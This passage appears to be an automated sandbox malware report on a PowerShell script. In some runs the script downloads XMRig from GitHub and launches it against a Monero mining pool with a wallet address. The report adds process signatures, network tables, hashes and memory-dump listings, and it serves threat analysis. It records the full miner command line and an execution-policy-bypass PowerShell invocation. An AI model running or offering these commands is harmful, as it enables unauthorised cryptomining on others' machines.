memory/3668-94-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-95-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-96-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-97-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-98-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-99-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-100-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-101-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-102-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-103-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-104-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-105-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-106-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-107-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-108-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-109-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-110-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-111-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-112-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-113-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-114-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-115-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-116-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-117-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-118-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1561s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
Files
memory/1904-4-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp
memory/1904-7-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-8-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/1904-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/1904-9-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-10-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-11-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-12-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:33
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2368 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2368 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/2368-3-0x00007FF925653000-0x00007FF925654000-memory.dmp
memory/2368-5-0x0000014760E90000-0x0000014760EB2000-memory.dmp
memory/2368-6-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-10-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-9-0x0000014779520000-0x0000014779596000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgmzoe5w.qex.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2368-25-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-61-0x0000014779380000-0x000001477938A000-memory.dmp
memory/2368-48-0x00000147793A0000-0x00000147793B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/388-90-0x000001AE78200000-0x000001AE78220000-memory.dmp
memory/2368-91-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/388-92-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/2368-93-0x00007FF925653000-0x00007FF925654000-memory.dmp
memory/2368-94-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-96-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/388-95-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-97-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-98-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-99-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-100-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-101-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-102-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-103-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-104-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-105-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-106-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-107-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-108-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-109-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-110-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-111-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-112-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-113-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-114-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-115-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-116-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-117-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-118-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-119-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-120-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-121-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-122-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-123-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-124-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-125-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-126-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-127-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-128-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-129-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-130-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-131-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-132-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-133-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-134-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-135-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-136-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-137-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-138-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-139-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-140-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-141-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-142-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-143-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-144-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-145-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-146-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-147-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-148-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-149-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-150-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-151-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-152-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-153-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-154-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-155-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-156-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-157-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
memory/1520-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
memory/1520-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp
memory/1520-6-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/1520-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4404 wrote to memory of 3656 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4404 wrote to memory of 3656 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/4404-3-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4404-5-0x000001D2AD920000-0x000001D2AD942000-memory.dmp
memory/4404-6-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-9-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-10-0x000001D2ADC10000-0x000001D2ADC86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l3voujmf.tjs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4404-25-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-48-0x000001D2AD9E0000-0x000001D2AD9F2000-memory.dmp
memory/4404-61-0x000001D2AD9D0000-0x000001D2AD9DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3656-90-0x000001FDC2A30000-0x000001FDC2A50000-memory.dmp
memory/3656-91-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-92-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/4404-93-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4404-94-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-95-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/3656-96-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-97-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-98-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-99-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-100-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-101-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-102-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-103-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-104-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-105-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-106-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-107-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-108-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-109-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-110-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-111-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-112-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-113-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-114-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-115-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-116-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-117-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-118-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-119-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-120-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-121-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-122-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-123-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-124-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-125-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-126-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-127-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-128-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-129-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-130-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-131-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-132-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-133-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-134-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-135-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-136-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-137-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-138-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-139-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-140-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-141-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-142-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-143-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
